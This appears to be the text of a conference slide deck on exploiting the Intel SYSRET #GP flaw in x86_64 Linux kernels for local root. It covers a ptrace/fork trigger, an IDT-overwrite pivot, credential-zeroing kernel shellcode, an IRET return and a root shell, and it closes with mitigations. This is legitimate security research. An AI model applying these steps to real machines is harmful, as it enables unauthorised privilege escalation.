Intel CPUs handle the SYSRET instruction in a peculiar way and can raise exceptions while still running in ring0. When the kernel is not extra careful while returning to userland after a syscall, bad things can happen. Like root shells.
2. Outline
● Syscalls and Context Switches
● Canonical Addresses
● SYSRET #GP Triggering
● Step by Step Exploitation and Rooting
3. Linux x86_64 Syscalls
● On old x86 processors: int $0x80 with the syscall Nr. in %eax and params in %ebx, %ecx, etc.
○ However it’s super slow and got replaced with Intel’s SYSENTER mechanism
● x86_64 uses AMD’s SYSCALL with params in %rdi, %rsi, %rdx, %r10, ... (%rcx cannot carry the 4th arg since SYSCALL clobbers it)
○ Faster to handle than the whole interrupt path
○ Intel CPUs adopted SYSCALL according to AMD’s specs since it became the standard syscall mechanism
4. SYSCALL/SYSRET
● Whenever a syscall is invoked via SYSCALL a
context switch to kernel mode takes place
○ When leaving the syscall the kernel needs to restore specific
userland registers
○ And transfer back to ring3 with SYSRET
● SYSRET is fast since it “only” needs to:
○ Load the saved %rip from %rcx
○ Restore RFLAGS from %r11
○ Swap %cs back to ring3 mode
● The kernel itself has to make sure to restore all other
userland registers before executing SYSRET
7. How Linux handles SYSRET
● arch/x86/kernel/entry_64.S:
ret_from_sys_call:
movl $_TIF_ALLWORK_MASK,%edi
...
sysret_check:
...
movq RIP-ARGOFFSET(%rsp),%rcx
CFI_REGISTER rip,rcx
RESTORE_ARGS 1,-ARG_SKIP,0
movq PER_CPU_VAR(old_rsp), %rsp
USERGS_SYSRET64
● The kernel makes sure to restore %rsp and %gs etc
and calls SYSRET in the end
8. Canonical Addresses
● On x86_64 registers are 64 bit wide
● But virtual addresses (and thus %rip) only use 48 bits
○ 48 bits == balanced value for page-tables/accessible memory
● Leftover high bits are reserved for CPU specific tricks
○ like the NX bit on position 63 of a page-table entry
● Meaning the value of %rip has to be “canonical” aka between
○ 0x0000000000000000 -> 0x00007FFFFFFFFFFF
○ 0xFFFF800000000000 -> 0xFFFFFFFFFFFFFFFF
● (Bits 48 .. 63 have to be copies of bit 47)
● Non-canonical values in %rip are not allowed and will trigger exceptions in certain cases
9. Non-canonical addresses and SYSRET
● Whenever a SYSRET is executed and the CPU sees
a non-canonical value in %rcx it triggers a #GP
● AMD specs however never defined when the #GP will actually happen
● Clever researchers at Xen found out AMD CPUs will trigger the #GP only once back in usermode
● Not so on Intel ...
10. Intel’s Version of SYSRET
● AMD’s specs omitted the check for non-canonical
values in %rcx / %rip
● Intel decided to check for non-canonical values
before the privilege level is changed
11. Intel’s Version of SYSRET
● Triggering a #GP from kernel mode has
consequences on Linux
● Recall that prior to executing SYSRET Linux
restores the userland %rsp and swaps %gs
● Intel’s SYSRET will #GP on the userland stack while
still being in ring0
12. #GP on userland %rsp
● #GP is an exception reached via an IDT entry:
arch/x86/kernel/traps.c:
set_intr_gate(X86_TRAP_GP, general_protection);
● Where general_protection is generated by the errorentry macro in arch/x86/kernel/entry_64.S:
.macro errorentry sym do_sym
ENTRY(\sym)
XCPT_FRAME
ASM_CLAC
PARAVIRT_ADJUST_EXCEPTION_FRAME
subq $ORIG_RAX-R15, %rsp
CFI_ADJUST_CFA_OFFSET ORIG_RAX-R15
call error_entry
...
13. #GP on userland %rsp
● error_entry sets up an exception stack frame and backs up all registers:
ENTRY(error_entry)
XCPT_FRAME
CFI_ADJUST_CFA_OFFSET 15*8
cld
movq_cfi rdi, RDI+8
movq_cfi rsi, RSI+8
movq_cfi rdx, RDX+8
…
● where movq_cfi is defined as
.macro movq_cfi reg offset=0
movq %\reg, \offset(%rsp)
CFI_REL_OFFSET \reg, \offset
.endm
14. #GP on userland %rsp
● When setting up the stack frame in error_entry all (general purpose) registers are saved to x(%rsp) / [rsp+x]
● But the kernel already restored the userland %rsp and registers before SYSRET
● => Arbitrary memory write while in ring0
● Classic possibility for privilege escalation
15. Linux’ Protection against n/c %rip
● This behaviour already bit Linux in 2006 (CVE-2006-0744)
● To make sure no code ends up in non-canonical address space (or right before it) a guard page was introduced
● mmap(0x7ffffffff000, 4096, PROT_READ … will return ENOMEM
● This way SYSRET “shouldn’t” return to any n/c address
16. Linux’ Protection against n/c %rip
● Another possibility is using a “safe” IRET path for
returning back to ring3
○ IRET requires ring3-backup on the stack to return to user-code
○ Is slower than SYSRET
● The ptrace interface sets an IRET path most of the
time
● However some syscalls return via a SYSRET path despite being ptraced
● One example is fork() since it signals through ptrace_event(), which does not force the IRET path
17. Crash PoC
● fork() a child
● Child sets PTRACE_TRACEME
● Raise SIGSTOP
● Parent sets PTRACE_O_TRACEFORK
● Child fork()s again
● Parent catches this fork
● And uses PTRACE_SETREGS to set %rip to n/c
● Pivots %rsp to arbitrary place
● And PTRACE_CONTINUEs
● fork() will return with SYSRET with n/c %rcx
● CPU will #GP, Pagefault, Doublefault and Panic
19. The plan
● We need to get Kernel Code Execution between
the #GP and Panic
● Then restore the damage we have done
● Set credentials of current process to 0
● Return back to userland
● And open shell
20. The target
● Since the #GP will always trigger a Pagefault and Doublefault we can pivot %rsp onto the IDT
● And set 2 specific registers to craft a fake IDT gate
● That will be written over the orig. Page- or Doublefault handler when the exception frame is pushed
21. IDT Layout
● We can read the IDTR (base and limit of the IDT) with the sidt instruction
22. IDT Gate Entry
● And setup a new gate with modified “Offsets”
23. The target
● Before we trigger #GP we can allocate a Landing
Area in Userland
● Where we copy code that will be executed
● Craft a fake IDT gate that points to this area
● Triggering #GP will then overwrite e.g. Doublefault
with the fake gate
● And the kernel will jump to Userland and execute
our code with kernel privs
24. Kernel Shellcode
● Inside this code we will have to swapgs in order to
access kernel structures
● Then we carefully rebuild all IDT entries that were
trashed in the overwrite process
● Then we can raise process credentials
25. Process structures
● Each process in userland has an associated kernel
structure (thread_union) that builds the kernel
stack:
thread_union
thread_info
Kernel Stack
26. Process structures
● thread_info itself has an element that points to
task_struct
thread_info
*task_struct
*exec_domain
…
27. Process structures < 2.6.29
● task_struct contains lots of info about the running
task
● and its credentials
task_struct
state
stack
usage
...
uid, gid, caps,...
29. Kernel Shellcode
● On < 2.6.29 raising process credentials is a matter
of finding uid, gid and caps in task_struct
● And patching them to 0
● Luckily in kernel mode %gs points to the per-CPU x8664_pda (/include/asm-x86/pda.h)
/* Per processor datastructure. %gs points to it while the kernel runs */
struct x8664_pda {
struct task_struct *pcurrent; /* 0 Current process */
unsigned long data_offset; /* 8 Per cpu data offset from linker address */
unsigned long kernelstack; /* 16 top of kernel stack for current */
unsigned long oldrsp; /* 24 user rsp for system call */
int irqcount; /* 32 Irq nesting counter. Starts with -1 */
int cpunumber; /* 36 Logical CPU number */
#ifdef CONFIG_CC_STACKPROTECTOR
unsigned long stack_canary;
...
30. Kernel Shellcode
● %gs:0 will point to task_struct
● So we can simply scan for the uid/gid pattern and zero it:
asm("movq %%gs:0, %0" : "=r"(ptr));
cred = (uint32_t *)ptr;
for (i = 0; i < 1000; i++, cred++) {
    if (cred[0] == uid && cred[1] == uid && cred[2] == uid && cred[3] == uid &&
        cred[4] == gid && cred[5] == gid && cred[6] == gid && cred[7] == gid) {
        cred[0] = cred[1] = cred[2] = cred[3] = 0;
        cred[4] = cred[5] = cred[6] = cred[7] = 0;
        break;
    }
}
● Where uid/gid are the values of getuid() and getgid()
● And our process will be root
31. Kernel Shellcode
● On >= 2.6.29 the x8664_pda is removed
● And task_struct contains a new member called cred (credential records)
● If %rsp wasn’t modified we could walk back to top
of stack to find thread_info
● And do heuristic scanning to find thread_info->task_struct->cred->uid/gid
● However with credential records come two new
functions
● prepare_kernel_cred / commit_creds
32. Kernel Shellcode
● prepare_kernel_cred creates a new clean
credentials structure
● commit_creds installs the new cred to the current
task
● Both symbols are exported through /proc/kallsyms
or /boot/System.map
● Kernel shellcode just needs to
commit_creds(prepare_kernel_cred(0));
● And we’re root again
33. Kernel Shellcode
● Next we will have to cleanly return back to
userland
● Easiest method is to use IRET:
__asm__ __volatile__(
    "movq %0, 0x20(%%rsp);"   /* SS     */
    "movq %1, 0x18(%%rsp);"   /* RSP    */
    "movq %2, 0x10(%%rsp);"   /* RFLAGS */
    "movq %3, 0x08(%%rsp);"   /* CS     */
    "movq %4, 0x00(%%rsp);"   /* RIP    */
    "swapgs;"
    "iretq;"
    :: "i"(USER_SS),
       "i"(user_stack),
       "i"(USER_FL),
       "i"(USER_CS),
       "i"(user_code)
);
● Where user_code points to memory in userland
that should be executed when kernel exits
34. Popping uid=0(root)
● user_code can do anything now since it runs as
root
● So we can simply execve(/bin/sh) from there
● However that happens inside the child so we have
to bring the rootshell back to the parent
● Or we just chmod() or setxattr() to drop a root-shell
36. Limitations
● These techniques work well with 2.6.18 - 3.9.X
● 3.10 mitigates the IDT attack by remapping the IDT read-only (arch/x86/kernel/traps.c):
__set_fixmap(FIX_RO_IDT, __pa_symbol(idt_table), PAGE_KERNEL_RO);
idt_descr.address = fix_to_virt(FIX_RO_IDT);
● CPUs with SMEP/SMAP will fault on executing/accessing userland memory while still being in ring0
● Grsecurity provides a handful of protections that make this bug a pain to exploit
○ GRKERNSEC_RANDSTRUCT
○ PAX_MEMORY_UDEREF
○ GRKERNSEC_HIDESYM
○ ...
37. Further thoughts
● Linux fix is weird (“only” forces ptrace_stop() to
use IRET)
● Syscalls can still return via SYSRET
● Also the underlying bug within SYSRET is still present
● Since it’s a hardware issue it might be present in
other OSes in different variations (OHAI 2006)
● Any1 wanna check FreeBSD …?